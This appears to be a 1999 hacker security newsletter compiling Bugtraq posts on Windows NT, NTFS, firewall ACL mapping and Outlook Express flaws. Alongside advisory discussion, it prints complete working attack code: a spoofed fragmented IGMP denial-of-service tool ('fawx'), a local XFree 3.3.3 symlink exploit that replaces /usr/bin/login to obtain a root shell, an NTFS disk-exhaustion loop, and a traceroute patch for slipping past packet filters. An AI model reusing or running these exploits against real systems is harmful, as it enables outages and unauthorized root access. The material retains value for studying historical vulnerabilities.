The instant I hit ^d his server rebooted. AFAIK there is nothing special in
the setup of the NT server.
I hope this clears up the picture.
Cheers
Simon
------------------------------------------------------------------------------
Date: Tue, 27 Apr 1999 10:55:52 -0700
From: Aleph One <aleph1@UNDERGROUND.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: Possible DOS in WinNT RAS (PPTP)
Summary of this thread.
Didn't work:
NT 4.0 SP4, RRAS - Chris Alliey <calliey@erols.com>
NT 4.0 Server SP3, 128-bit, no RAS - Russ <Russ.Cooper@rc.on.ca>
NT 4.0 Server SP3, PPTP3-fix, no RAS 128-bit - Russ <Russ.Cooper@rc.on.ca>
NT 4.0 Server SP4, 128-bit, no RAS - Russ <Russ.Cooper@rc.on.ca>
NT 4.0 Server SP4 - Lewman, Andrew <ALewman@Lifespan.org>
NT 4.0 Server Enterprise, SP4 - Lewman, Andrew <ALewman@Lifespan.org>
Yes:
NT 4.0 SP4, Option Pack - Huang Min <hmin@dns.cqpn.gov.cn>
NT 4.0 Server, SP4, 40-bit, RAS - Simon Helson <simon@concepts.co.nz>
Hardware or device driver error, or maybe an issue with RAS but not RRAS?
--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
@HWA
14.0 MFT problem could cause you to have to reformat your drive (NTFS)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 27 Apr 1999 18:26:54 +0400
From: Vladimir Dubrovin <vlad@sandy.ru>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: MFT problem
Hello NTBUGTRAQ,
Sorry for my bad English...
Some times ago it was noticed the problem with MFT. I don't know if
this problem was discussed in this list, so if it is - just discard
this message.
The problem is:
Then creating a very large number of empty files on NTFS partition and
then removing this files you loose a lot of space (up to 90% of
volume!) and you couldn't recover this space without reformatting the
NTFS volume. This problem occurs because NT allocates space in MFT
(Master File Table, an internal NTFS database). Then the MFT reserved
space ends NT allocates new space for MFT. The space allocated for MFT
will never be released. (information "How NTFS Reserves Space for its
Master File Table (MFT)" can be found in KB article Q174619).
Then creating empty file (with zero length) it takes disk space
olny in directory entry and MFT table. If you'll fill your NTFS volume
with such files and then delete them the MFT table will take the most
of your hard drive space (up to 90% as it was noticed before).
You can reproduce this problem next way:
It's better to use empty NTFS volume of small size - 50-100Mb - the
results will be more distinctive.
Check the free space on your NTFS volume.
md temp
for /L %i in (1,1,1000000) do type nul >temp/file.%i.tmp
then you fill all the partition with this files - abort the circle.
del /Q temp\*.*
del /Q temp
Now you can check free space on your hard drive. You've loosed it
almost completely...
By the way: it seems
dir /A $MFT
doesn't shows real MFT size, as it described in Microsoft
documentation. At least you will never find the space you've loosed in
any special file. But you can try some other utility, such as
defragmentation utilities - usually they shows MFT reserved space...
The problem is, that any user, who has "create" permition in any
directory on NTFS volume can bring this volume down.
It's specially interesting if your FTP server has "incoming"
directory, or you offer free HTML pages for your customers on NTFS
volume...
This problem isn't solvable with some kind of disk quotas,
because the files are empty...
I've contacted Vitaly Savenkov from Russian department of Microsoft,
russia@microsoft.com.
He forwarded me reply from developers:
<><><><><><><>
Dear ...,
I'm sorry that I have to tell you the following.
-
My investigations and the answers from our Secondary Response Group
confirmed, that the $MFT will never shrink.
The only way is to reformat the Partition.
This behavior is the drawback resulting from optimizing the
NTFS performance. The main goal was to avoid fragmentation.
-
Possibly the best resolution for your situation is to use a
single partition for the FTP Data. If the available space then
goes under an acceptable level you can backup this partition
and reformat it.
I checked this with our Escallation Team and so i can say that
this behavior of NTFS will not be changed.
best regards,
...
<><><><><><><>
So, now you can check it...
+=-=-=-=-=-=-=-=-=+
|Vladimir Dubrovin|
| CSS Coordinator |
| Sandy Info, ISP |
=+=-=-=-=-=-=-=-=-=+=-=
@HWA
15.0 Firewalking, a paper to determine gateway access control lists
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm Security
http://www.genocide2600.com/~tattooman/unix-audit/firewalk/
------------------------------------------------------------------------------------
Firewalking
A Traceroute-Like Analysis of IP Packet Responses to Determine Gateway
Access Control Lists
Cambridge Technology Partners'
Enterprise Security Services
David Goldsmith
Senior Security Architect
dhg@es2.net
Michael Schiffman
Senior Security Architect
mds@es2.net
October 1998
Contents of this document are Copyright (c) 1998 Cambridge Technology Partners
Enterprise Security Services, Inc. Distribution is unlimited under the
condition that due credit is given and no fee is charged.
ESS is a division of Cambridge Technology Partners, Inc.
TABLE OF CONTENTS
i. Terminology
ii. A note about examples
I. Introduction
II. Traceroute
III. Information gathering using traceroute
IV. Firewalking
V. Firewalk - The tool
VI Risk Mitigation
i. Terminology
ACL Access Control List. A set of rules that enforce a security
policy. In the scope of this paper, an Access Control List
will solely apply to network policy.
Router/Gateway Used interchangeably. In the scope of this report, they refer
to a multi-homed host that is configured to forward IP
datagrams. It may or may not have a packet filtering ACL in
place that denies some network traffic.
Ingress traffic Describes network traffic that originates from the outside
of a network perimeter and progresses towards the inside.
Egress traffic Describes network traffic that originates from the inside of a
network perimeter and progresses towards the outside.
Firewall Refers to a multi-homed host configured to forward IP
datagrams which uses a packet filtering ACL to control
network traffic.
ii. A note about examples
There are several sample traceroute dumps used in this report. The astute
reader will note that the IP addresses are RFC 1918[1] compliant non-routable
internal network addresses. The empirical data and traceroute dumps are taken
directly from live Inte rnet hosts1, and in order to protect their identity,
we have changed the addresses to anonymize the machines and networks involved.
iii. A note about diagrams
There are none in this ASCII version. For the real deal, check out one of the
grapical formats from http://www.es2.net/research/firewalk.
I. Introduction
This paper describes Firewalking, a technique that can be used to gather
information about a remote network protected by a firewall. The purpose
of the paper is to examine the risks that this technique represents. This
paper is intended for a technical audience with an advanced understanding of
network infrastructure and TCP/IP packet structures.
Firewalking uses a traceroute-like IP packet analysis to determine whether or
not a particular packet can pass from the attacker's host to a destination
host through a packet-filtering device. This technique can be used to map
'open' or 'pass through' ports on a gateway. More over, it can determine
whether packets with various control information can pass through a given
gateway. Also, using this technique, an attacker can map routers behind a
packet-filtering device. To fully understand how this technique works, we
first need to understand how traceroute works. This paper provides an
introduction to traceroute.
II. Traceroute
Traceroute [1] is a network debugging utility designed to map out all hosts en
route to a particular destination. Traceroute works by sending UDP or ICMP
echo (ping)2 packets to a destination host and monotonically increasing the
time to live (TTL) field in the IP header each successive round (by default, a
round consists of three packets or probes). If the traceroute scan is done
using UDP the destination port will be incremented with each probe sent.
The IP TTL field is used to limit the lifetime of datagrams across the
Internet and is decremented just before a router forwards a packet. If this
reduction would cause the TTL to be 0 or less, the router in question will
send back an ICMP error message (time to live exceeded in transit) to the
original host. This lets the original host know at which router the packet
expired. By starting the TTL at one, routers between two given hosts can be
found by increasing the TTL and monitoring the ICMP responses (provided there
isn't any prohibitive filtering or any severe packet loss). To ensure that it
gets a proper response from the ultimate destination host (an ICMP port
unreachable or an ICMP echo reply) traceroute will either pick a high UDP port
that is unlikely to be used by any application or use ping packets.
III. Information gathering using traceroute
With an understanding of how traceroute works, we can now explore how this can
this be used to leverage information about a particular network. This section
will demonstrate two different ways of using traceroute to do some network
reconnaissance. These following examples are contrived to show specific
situations that may or may not be commonplace.
- Protocol subterfuge
The first scenario involves a network protected by a firewall that is blocking
all ingress traffic except for ping and ping responses (ICMP types 8 and 0
respectively). We can use the stock traceroute program to show us what hosts
are behind this filter (which is presumably against the security policy).
Instead of the default behavior of using UDP (Figure 1), we want to force
traceroute to use ICMP packets (Figure 2). Notice that this time we are
able to view hosts behind the firewall.
zuul:~>traceroute 10.0.0.10
traceroute to 10.0.0.10 (10.0.0.10), 30 hops max, 40 byte packets
1 10.0.0.1 (10.0.0.1) 0.540 ms 0.394 ms 0.397 ms
2 10.0.0.2 (10.0.0.2) 2.455 ms 2.479 ms 2.512 ms
3 10.0.0.3 (10.0.0.3) 4.812 ms 4.780 ms 4.747 ms
4 10.0.0.4 (10.0.0.4) 5.010 ms 4.903 ms 4.980 ms
5 10.0.0.5 (10.0.0.5) 5.520 ms 5.809 ms 6.061 ms
6 10.0.0.6 (10.0.0.6) 9.584 ms 21.754 ms 20.530 ms
7 10.0.0.7 (10.0.0.7) 89.889 ms 79.719 ms 85.918 ms
8 10.0.0.8 (10.0.0.8) 92.605 ms 80.361 ms 94.336 ms
9 * * *
10 * * *
Figure 1
zuul:~>traceroute -I 10.0.0.10
traceroute to 10.0.0.10 (10.0.0.10), 30 hops max, 40 byte packets
1 10.0.0.1 (10.0.0.1) 0.540 ms 0.394 ms 0.397 ms
2 10.0.0.2 (10.0.0.2) 2.455 ms 2.479 ms 2.512 ms
3 10.0.0.3 (10.0.0.3) 4.812 ms 4.780 ms 4.747 ms
4 10.0.0.4 (10.0.0.4) 5.010 ms 4.903 ms 4.980 ms
5 10.0.0.5 (10.0.0.5) 5.520 ms 5.809 ms 6.061 ms
6 10.0.0.6 (10.0.0.6) 9.584 ms 21.754 ms 20.530 ms
7 10.0.0.7 (10.0.0.7) 89.889 ms 79.719 ms 85.918 ms
8 10.0.0.8 (10.0.0.8) 92.605 ms 80.361 ms 94.336 ms
9 10.0.0.9 (10.0.0.9) 94.127 ms 81.764 ms 96.476 ms
10 10.0.0.10 (10.0.0.10) 96.012 ms 98.224 ms 99.312 ms
Figure 2
- Nascent port seeding
The second scenario involves a more common example of a network protected
by a firewall which blocks all ingress traffic except for UDP port 53
(Domain Name Service or DNS).
zuul:~>traceroute 10.0.0.10
traceroute to 10.0.0.10 (10.0.0.10), 30 hops max, 40 byte packets
1 10.0.0.1 (10.0.0.1) 0.540 ms 0.394 ms 0.397 ms
2 10.0.0.2 (10.0.0.2) 2.455 ms 2.479 ms 2.512 ms
3 10.0.0.3 (10.0.0.3) 4.812 ms 4.780 ms 4.747 ms
4 10.0.0.4 (10.0.0.4) 5.010 ms 4.903 ms 4.980 ms
5 10.0.0.5 (10.0.0.5) 5.520 ms 5.809 ms 6.061 ms
6 10.0.0.6 (10.0.0.6) 9.584 ms 21.754 ms 20.530 ms
7 10.0.0.7 (10.0.0.7) 89.889 ms 79.719 ms 85.918 ms
8 10.0.0.8 (10.0.0.8) 92.605 ms 80.361 ms 94.336 ms
9 * * *
10 * * *
Figure 3
As you can see from figure 3, the traceroute scan is blocked at the 8th
hop because no traffic is allowed entrance into the network except for DNS
queries. Armed with this knowledge, we can easily map hosts behind the gateway.
We can control the following:
* The starting source port of the traceroute (which, by default,
increases monotonically as each probe is sent).
* The number of probes sent each round (by default this is 3).
We can determine the following:
* The number of hops in between our attacking host and the target firewall.
This information allows us to deterministically control the port number of the
probe that will reach the firewall. Due to the fact that the firewall does no
content analysis, we can fool it into thinking our packets are DNS queries,
and therefore, we can bypass the ACL. We simply begin our scan with a
starting port number of:
(target_port - (number_of_hops * num_of_probes)) - 1
If you are more then (target_port - 1) number of hops from your destination
this method obviously will not work. For our above example this gives us:
(53 - (8 * 3)) - 1 = 28
The probe that reaches the filter will have an acceptable port number as
dictated by the firewall's ACL and will be allowed to pass unmolested
(Figure 4).
zuul:~>traceroute -p28 10.0.0.10
traceroute to 10.0.0.10 (10.0.0.10), 30 hops max, 40 byte packets
1 10.0.0.1 (10.0.0.1) 0.501 ms 0.399 ms 0.395 ms
2 10.0.0.2 (10.0.0.2) 2.433 ms 2.940 ms 2.481 ms
3 10.0.0.3 (10.0.0.3) 4.790 ms 4.830 ms 4.885 ms
4 10.0.0.4 (10.0.0.4) 5.196 ms 5.127 ms 4.733 ms
5 10.0.0.5 (10.0.0.5) 5.650 ms 5.551 ms 6.165 ms
6 10.0.0.6 (10.0.0.6) 7.820 ms 20.554 ms 19.525 ms
7 10.0.0.7 (10.0.0.7) 88.552 ms 90.006 ms 93.447 ms
8 10.0.0.8 (10.0.0.8) 92.009 ms 94.855 ms 88.122 ms
9 10.0.0.9 (10.0.0.9) 101.163 ms * *
10 * * *
Figure 4
You will notice that the scan terminates immediately after the target port
is passed. This is due to the fact that traceroute continues
to increase
the port numbers for each probe sent. The probe immediately after the
successful one will be denied by the ACL on the firewall. To possibly get
further, a simple modification to traceroute can be done to add a command
line switch to stop port incrementation (Figure 5). This allows us to force
every probe we send to be acceptable to the firewall's ACL (a side effect
being that we might not get the normal ICMP unreachable message from the
ultimate destination due to the fact that there might actually be something
listening on the other end). See appendix A for the source code patch.
zuul:~>traceroute -S -p53 10.0.0.15
traceroute to 10.0.0.15 (10.0.0.15), 30 hops max, 40 byte packets
1 10.0.0.1 (10.0.0.1) 0.516 ms 0.396 ms 0.390 ms
2 10.0.0.2 (10.0.0.2) 2.516 ms 2.476 ms 2.431 ms
3 10.0.0.3 (10.0.0.3) 5.060 ms 4.848 ms 4.721 ms
4 10.0.0.4 (10.0.0.4) 5.019 ms 4.694 ms 4.973 ms
5 10.0.0.5 (10.0.0.5) 6.097 ms 5.856 ms 6.002 ms
6 10.0.0.6 (10.0.0.6) 19.257 ms 9.002 ms 21.797 ms
7 10.0.0.7 (10.0.0.7) 84.753 ms * *
8 10.0.0.8 (10.0.0.8) 96.864 ms 98.006 ms 95.491 ms
9 10.0.0.9 (10.0.0.9) 94.300 ms * 96.549 ms
10 10.0.0.10 (10.0.0.10) 101.257 ms 107.164 ms 103.318 ms
11 10.0.0.11 (10.0.0.11) 102.847 ms 110.158 ms *
12 10.0.0.12 (10.0.0.12) 192.196 ms 185.265 ms *
13 10.0.0.13 (10.0.0.13) 168.151 ms 183.238 ms 183.458 ms
14 10.0.0.14 (10.0.0.14) 218.972 ms 209.388 ms 195.686 ms
15 10.0.0.15 (10.0.0.15) 236.102 ms 237.208 ms 230.185 ms
Figure 5
- Taking it a bit further
Since the magic of traceroute is all happening at the IP layer, any transport
protocol (UDP, TCP and ICMP) can be used. The foundation laid down by
traceroute can extend to any other protocol on top on IP. If we attempt to
traceroute to a machine behind a firewall and the probe reaching the firewall
is prohibited by an ACL filter, the packet will be dropped on the floor (in
most cases). All we can determine from the traceroute scan is the last
gateway (in this case, a firewall) that responded. This is good entropic
information. This firewall can then become a waypoint that we use to
determine the success of future probes. If we traceroute to a machine behind
this firewall with a different (protocol) traceroute probe, and we get a
response, we know two things: 1) that particular kind of traffic is passed by
the firewall, and 2) we know a host behind the firewall. If we only get as
far as our waypoint, we know that traffic type is filtered. This is the basis
for firewalking.
IV. Firewalking
In order to use a gateway's response to gather information, we must know two
pieces of information:
- The IP address of the last known gateway before the firewalling takes place
- The IP address of a host located behind the firewall.
The first IP address serves as our metric (waypoint from the above example),
if we can't get a response past that machine, then we assume that whatever
protocol we tried to pass is being blocked3. The second IP address is used as
a destination to direct the packet flow (Figure 6).
[ image ]
Using this technique, we can perform several different information gathering
attacks. One attack is a firewall protocol scan, which will determine what
ports/protocols a firewall will let traffic through on from the attacking
host. This would attempt to pass packets on all ports and protocols and
monitor the responses. A second potential threat is advanced network mapping.
By sending packets to every host behind a packet filter, an attacker can
generate an accurate map of a network's topology.
V. Firewalk - The tool
While traceroute is a useful application, it is not very extensible for any
kind of serious reconnaissance scanning; to this end, the proof of concept
tool, firewalk, was built.
- Fire, walk with me where?
Firewalk is a network-auditing tool that employs the techniques described
above. It attempts determines what transport protocols a given gateway
will let through. The firewalk scan works by sending out TCP or UDP packets
with an IP TTL one greater then the targeted gateway. If the gateway allows
the traffic, it will forward the packets to the next hop where they will
expire and elicit a TTL exceeded in transit message. If the gateway host does
not allow the traffic, it will likely drop the packets on the floor and we
will see no response. By sending probes in a successive manner and recording
which ones answer and which ones don't, the access list on the gateway can be
determined.
- 2 Phases
To work its magic, firewalk has two phases, a network discovery phase, and a
scanning phase. Initially, to get the correct IP TTL (that will result in
expired packets one beyond the gateway) we need to 'ramp up' hop counts. We
do TTL ramping in the same manner that traceroute works, sending packets out
with successively incremented IP TTLs, towards the destination host. Once
we know the gateway hopcount (at that point the scan is 'bound') we can move
onto the next phase, the actual scan.
The actual scan is simple. Firewalk sends out TCP or UDP packets and sets
a timeout; if it receives a response before the timer expires, the port is
considered open, if it doesn't, the port is considered closed (Figure 7).
zuul:#firewalk -n -P1-8 -pTCP 10.0.0.5 10.0.0.20
Firewalking through 10.0.0.5 (towards 10.0.0.20) with a maximum of 25 hops.
Ramping up hopcounts to binding host...
probe: 1 TTL: 1 port 33434: <response from> [10.0.0.1]
probe: 2 TTL: 2 port 33434: <response from> [10.0.0.2]
probe: 3 TTL: 3 port 33434: <response from> [10.0.0.3]
probe: 4 TTL: 4 port 33434: <response from> [10.0.0.4]
probe: 5 TTL: 5 port 33434: Bound scan: 5 hops <Gateway at 5 hops> [10.0.0.5]
port 1: open
port 2: open
port 3: open
port 4: open
port 5: open
port 6: open
port 7: *
port 8: open
13 packets sent, 12 replies received
Figure 7
- A Slow Walk
As noted above, packets on an IP network can be dropped for a variety of
reasons. When a packet is dropped for any reason other then it being denied
by a filter, it is extraneous loss. For our firewalk scan to be accurate,
we need to limit this extraneous packet loss to the best of our ability. The
best we can do in most cases is to be redundant with the number of probes
we send. Unless there is severe network congestion some of the probes should
get through. However, what if the probe we send is filtered or dropped by a
different gateway while en route to the target gateway (see figure 8).
[ image ]
To firewalk, this will look like the target gateway has denied the packet,
which, in this case, is certainly a false negative. This is not extraneous
loss, so simply sending more packets will not help. To prevent this, we must
perform a `slow walk` or a `creeping walk`. This is akin to a normal scan,
however we scan each hop en route to the target. We perform a standard
firewalk ramping phase, and then scan each intermediate hop up to the
destination. This allows prevents false negatives due to intermediate filter
blockage and allows firewalk to be more confident in its report. The major
benefit is that we can now determine if blocked ports are false negatives.
The drawback is that it is, as it's name states, slow.
More information about Firewalk (including the source) is available from
http://www.es2.net/research/firewalk.
VI. Risk Mitigation
The easiest solution to this problem is to disallow ICMP TTL Exceeded
messages from leaving an internal network. This will also have the effect
of breaking valid uses of traceroute and may inhibit remote diagnostics of
an internal network problem.
Another defense against firewalking is the use of some form of proxy server.
Network Address Translation (NAT) or any proxy server (both application
level and circuit level) can prevent Firewalk from probing behind them. While
network based intrusion detection tools could detect certain attacks [3];
it is possible to develop a version of Firewalk that would generate packets
that would look like valid packets for each service that it is scanning.
Currently, Firewalk only fills in the packet header and does not insert any
data into a packet. A more sophisticated version could emulate various
services in an attempt to masquerade as valid traffic and randomize the order
and times that it scans services.
Appendix A. traceroute static port diff
Apply this diff to traceroute version 1.4a5 to add support for static
destination ports. Apply the diff using the unix patch program from the
traceroute source directory:
---------------------8<-------- traceroute.diff ------------------------------
--- traceroute.c.orig Fri Aug 21 15:15:23 1998
+++ traceroute.c Sun Aug 23 18:58:08 1998
@@ -289,6 +289,7 @@
int nprobes = 3;
int max_ttl = 30;
int first_ttl = 1;
+int static_port = 0;
u_short ident;
u_short port = 32768 + 666; /* start udp dest port # for probe packets */
@@ -352,7 +353,7 @@
prog = argv[0];
opterr = 0;
- while ((op = getopt(argc, argv, "dFInrvxf:g:i:m:p:q:s:t:w:")) != EOF)
+ while ((op = getopt(argc, argv, "dFInrvxf:g:i:m:p:q:Ss:t:w:")) != EOF)
switch (op) {
case 'd':
@@ -406,6 +407,13 @@
options |= SO_DONTROUTE;
break;
+ case 'S':
+ /*
+ * Tell traceroute to not increment the destination
+ * port, useful for bypassing some packet filters.
+ * Useless without the -p option.
+ static_port = 1;
+ break;
case 's':
/*
* set the ip source address of the outbound
@@ -744,7 +752,7 @@
register struct ip *ip;
(void)gettimeofday(&t1, &tz);
- send_probe(++seq, ttl, &t1);
+ send_probe(static_port ? seq : ++seq, ttl, &t1);
while ((cc = wait_for_reply(s, from, &t1)) != 0) {
(void)gettimeofday(&t2, &tz);
i = packet_ok(packet, cc, from, seq);
@@ -1300,9 +1308,9 @@
extern char version[];
Fprintf(stderr, "Version %s\n", version);
- Fprintf(stderr, "Usage: %s [-dFInrvx] [-g gateway] [-i iface] \
-[-f first_ttl] [-m max_ttl]\n\t[ -p port] [-q nqueries] [-s src_addr] [-t tos] \
-[-w waittime]\n\thost [packetlen]\n",
+ Fprintf(stderr, "Usage: %s [-dFInrSvx] [-g gateway] [-i iface] \
+[-f first_ttl]\n\t[-m max_ttl] [ -p port] [-q nqueries] [-s src_addr] \
+[-t tos]\n\t[-w waittime] host [packetlen]\n",
prog);
exit(1);
}
---------------------8<-------- traceroute.diff ------------------------------
Appendix B. References
[1] Y. Rekhter, B. Moskowitz, D. Karrenberg, G. J. de Groot and E. Lear,
"Address Allocation for Private Internets" RFC1918, February 1996
[2] Van Jacobson, traceroute documentation and source code, Lawrence
Berkeley National Laboratory
[3] Thomas H. Ptacek and Timothy Newsham, "Insertion, Evasion, and Denial
of Service: Eluding Network Intrusion Detection", Secure Networks,
January 1998
1 In fact, in the traceroute dumps, the original RTTs (round-trip times)
are left in as they appeared.
2 Traceroute version 1.4a5 (ftp://ee.lbl.gov/traceroute1.4a5.tar.Z)
allows for ICMP echo based traceroutes via the -I flag. Windows NT's
version of traceroute 'tracert' exclusively uses ICMP echoes.
3 It should be noted that the assumption that it is our target gateway
that is dropping the traffic may not be correct. There are several things
that could cause a false positive in this case:
- A host could also be down or simply not responding.
- IP is unreliable. Packets can be dropped for any number of reasons.
- The packet could also be dropped by a previous filtering gateway
before it ever reaches our target gateway host.
4 It is significant to note that the ultimate destination host does not
have to be reached. It just needs to be somewhere downstream, on the
other side of the gateway from the firewalking host.
5 If an intermediate filter is shown to drop packets, this prevents
firewalk from scanning the actual target machine for the blocked packet
type, on that route. This is annoying.
EOF
@HWA
16.0 IGMP+8 fragmentation attack for Linux
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* fawx.c v1 by ben-z -- igmp-8+frag attack for linux *
* thanks to datagram for ssping.c - helped lots *
* -------------------------------------------------- *
* DESCRIPTION: *
* Sends oversized fragmented IGMP packets to a box *
* either making it freeze (WinNT/9x), or lagging *
* it to hell and back. Since most win32 firewalls *
* dont support IGMP, the attack successfully *
* penetrates into the system, making it much more *
* effective than an ICMP attack which is likely to *
* be filtered. *
* GREETINGS: *
* mad props to datagram for writing ssping, also *
* thanks to #fts(2) on undernet and the psychic *
* crew on efnet. shouts to ka0z, cyrus, magicfx, *
* ice-e, zeronine, soupnazi, benito, eklipz, c0s, *
* metalman, chawp, folk, atomic-, dethwish, sindawg *
* mosthated, and everyone on irc.slacknet.org.. */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/igmp.h>
void banner(void) {
printf(" -----------------------------------------------\n");
printf("| fawx v1 by ben-z: igmp-8+frag spoofing attack |\n");
printf(" -----------------------------------------------\n");
}
void usage(const char *progname) {
printf("[**] syntax: %s <spoof host> <target host> <number>\n",progname);
}
int resolve( const char *name, unsigned int port, struct sockaddr_in *addr ) {
struct hostent *host;
memset(addr,0,sizeof(struct sockaddr_in));
addr->sin_family = AF_INET;
addr->sin_addr.s_addr = inet_addr(name);
if (addr->sin_addr.s_addr == -1) {
if (( host = gethostbyname(name) ) == NULL ) {
fprintf(stderr,"\nuhm.. %s doesnt exist :P\n",name);
return(-1);
}
addr->sin_family = host->h_addrtype;
memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
}
addr->sin_port = htons(port);
return(0);
}
unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
int send_fawx(int socket,
unsigned long spoof_addr,
struct sockaddr_in *dest_addr) {
unsigned char *packet;
struct iphdr *ip;
struct igmphdr *igmp;
int rc;
packet = (unsigned char *)malloc(sizeof(struct iphdr) +
sizeof(struct igmphdr) + 8);
ip = (struct iphdr *)packet;
igmp = (struct igmphdr *)(packet + sizeof(struct iphdr));
memset(ip,0,sizeof(struct iphdr) + sizeof(struct igmphdr) + 8);
ip->ihl = 5;
ip->version = 4;
ip->id = htons(34717);
ip->frag_off |= htons(0x2000);
ip->ttl = 255;
ip->protocol = IPPROTO_IGMP;
ip->saddr = spoof_addr;
ip->daddr = dest_addr->sin_addr.s_addr;
ip->check = in_cksum(ip, sizeof(struct iphdr));
igmp->type = 8;
igmp->code = 0;
if (sendto(socket,
packet,
sizeof(struct iphdr) +
sizeof(struct igmphdr) + 1,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct igmphdr) + 8);
ip->frag_off = htons(8 >> 3);
ip->frag_off |= htons(0x2000);
ip->check = in_cksum(ip, sizeof(struct iphdr));
igmp->type = 0;
igmp->code = 0;
if (sendto(socket,
packet,
sizeof(struct iphdr) +
sizeof(struct igmphdr) + 8,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }
free(packet);
/* printf("."); <- it looked way too ugly :P */
return(0);
}
int main(int argc, char * *argv) {
struct sockaddr_in dest_addr;
unsigned int i,sock;
unsigned long src_addr;
banner();
if ((argc != 4)) {
usage(argv[0]);
return(-1);
}
if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
fprintf(stderr,"error opening raw socket. <got root?>\n");
return(-1);
}
if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); }
src_addr = dest_addr.sin_addr.s_addr;
if (resolve(argv[2],0,&dest_addr) == -1) { return(-1); }
printf("[**] sending igmp-8+frag attacks to: %s.",argv[2]);
for (i = 0;i < atoi(argv[3]);i++) {
if (send_fawx(sock,
src_addr,
&dest_addr) == -1) {
fprintf(stderr,"error sending packet. <got root?>\n");
return(-1);
}
usleep(10000);
}
printf(" *eof*\n");
}
@HWA
17.0 Local XFree 3.3.3 symlink root compromise..(freeBSD+others)......
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*** local XFree 3.3.3-symlink root-compromise.
*** Tested under FreeBSD 3.1 (but should work on others 2)
*** (C) 1999/2000 by Stealthf0rk for the K.A.L.U.G.
*** (check out http://www.kalug.lug.net/stealth or /coding for
*** other kewl stuff!)
***
*** FOR EDUCATIONAL PURPOSES ONLY!!! USE IT AT YOUR OWN RISK.
*** Even if this program restores all, you should backup your
*** login before running this.
***/
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#define LOGIN "/usr/bin/login"
#define TELNET "/usr/bin/telnet"
int cp(const char*, const char*, int);
int main(int argc, char **argv)
{
char *telnet[] = {TELNET, "localhost", NULL};
char *shell[] = {"/bin/sh", NULL};
char *X[] = {"/usr/X11R6/bin/xinit", NULL};
FILE *f = NULL;
int p = 0;
char buf[1000] = {0};
/* the rootshell */
if (!geteuid() || !getuid()) {
unlink(LOGIN);
cp("/tmp/L", LOGIN, 1);
chmod(LOGIN, 04555);
printf("Welcome!\n");
unlink("/tmp/.X11-unix");
unlink("/tmp/L");
execve(*shell, shell, NULL);
}
/* back up */
cp(LOGIN, "/tmp/L", 1);
if (symlink(LOGIN, "/tmp/.X11-unix") < 0) {
perror("symlink (/tmp/.X11-unix)");
exit(errno);
}
if ((p = fork()) < 0) {
perror("fork");
exit(errno);
} else if (p > 0) {
sleep(7);
kill(p, 9);
cp(argv[0], LOGIN, 1);
execve(telnet[0], telnet, NULL);
perror("fatal:");
} else {
printf("Xfree 3.3.3 root-sploit by Stealth. http://www.kalug.lug.net\n");
printf("\n-> Please give me some seconds... <-\n\n");
execve(X[0], X, NULL);
}
return 0;
}
int cp(const char *from, const char *to, int how)
{
int in = 0, out = 0, r = 0;
char buf[1000] = {0};
printf("cp %s %s\n", from, to);
/* overwrite ? */
if (how == 1)
how = O_RDWR|O_TRUNC|O_CREAT;
else
how = O_RDWR|O_CREAT;
if ((out = open(to, how)) < 0) {
perror("open 1");
exit(errno);
}
if ((in = open(from, O_RDONLY)) < 0) {
perror("open 2");
exit(errno);
}
while ((r = read(in, buf, 1000-1)) > 0) {
write(out,buf,r);
memset(buf,0,1000);
}
close(in); close(out);
return 0;
}
@HWA
18.0 Microsoft Outlook Express internet zone vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Mon, 26 Apr 1999 05:07:19 -0700
From: "1nternal @geocities.com" <1nternal@MY-DEJANEWS.COM>
To: BUGTRAQ@netspace.org
Subject: Minor privacy exploit in Outlook Express
Outlook Express uses HTML to display ceratin information in the 'outlook today' type part of outlook
express, ie, the number of unread messages in your inbox etc...
Because it is considered to be in the 'internet zone', this information needs to be safely scriptable,
thus it can be accessed by any site in this zone. This allows for a possible (although admittedly minor)
privacy and possibly security problem.
The 'problem' lies in the 'OutlookExpress.MessageList' ActiveX control, which is marked safe for
scripting, it allows for counting the number of messages in any folder within outlook express, as well as
the number of unread items and a few other things, such as setting options, however, the options are only
set for that instance only and are not saved.
An example of viewing the number of messages in a folder, as well as previewing the message (creating the
file 'C:\oe_prev$.eml' without the users permission). It should be noted that this preview message is not
accessible remotely(without an exploit).
<script language="VBSCRIPT"><!--
set MsgList = CreateObject("OutlookExpress.MessageList")
MsgList.Folder = 6
msgbox(MsgList.Count)
location.href = MsgList.PreviewMessage
--></script>
Obviously, this could also be done in JavaScript, however it would still require activeX support and OE5.
1nternal@my-dejanews.com
@HWA
19.0 Big Brother 1.09b/c security notice.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
